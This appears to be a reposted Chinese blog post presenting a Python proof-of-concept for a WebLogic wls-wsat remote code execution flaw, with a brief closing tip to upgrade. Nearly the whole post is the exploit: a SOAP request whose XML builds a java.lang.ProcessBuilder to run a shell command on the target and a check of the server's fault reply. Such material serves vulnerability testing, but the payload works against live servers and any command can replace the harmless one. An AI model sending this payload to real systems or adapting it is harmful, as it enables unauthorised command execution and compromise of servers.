码迷,mamicode.com
首页 > Web开发 > 详细

Weblogic wls RCE 漏洞验证POC

时间:2017-12-23 14:16:23      阅读:1020      评论:0      收藏:0      [点我收藏+]

标签:int   date   cep   print   lin   验证   漏洞   org   object c   

#!/usr/bin/env python
# coding:utf-8
# @Date    : 2017/12/22 17:11
# @File    : weblogic_poc.py
# @Author  : sevck (jianan.huang@qingteng.cn)
# @Link    : http://www.qingteng.cn                  
#-------------------------------------------------------------------------  
import requests
import re
from sys import argv

heads = {
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3,
    Content-Type: text/xml;charset=UTF-8
    }

def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += /wls-wsat/CoordinatorPortType
    post_str = ‘‘‘
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="2">
                <void index="0">
                  <string>/bin/touch</string>
                </void>
                <void index="1">
                  <string>/tmp/weblogic</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    ‘‘‘

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception, e:
        response = ""

    if <faultstring>java.lang.ProcessBuilder in response or "<faultstring>0" in response:
        result = "Vulnerability"
        return result
    else:
        result = "No Vulnerability"
        return result


if __name__ == __main__:
    if len(argv) == 1:
        print "python weblogic_poc.py url:port"
        exit(0)
    else:
        url = argv[1]
    result = poc(url=url)
    print result

说点修复建议:

个人建议直接更新最新版吧,老版本还是问题太多。昨晚和廖师父聊天中告知又提交了一个weblogic的RCE,已经拿到CVE就在等待发布了

Weblogic wls RCE 漏洞验证POC

标签:int   date   cep   print   lin   验证   漏洞   org   object c   

原文地址:http://www.cnblogs.com/sevck/p/8092760.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!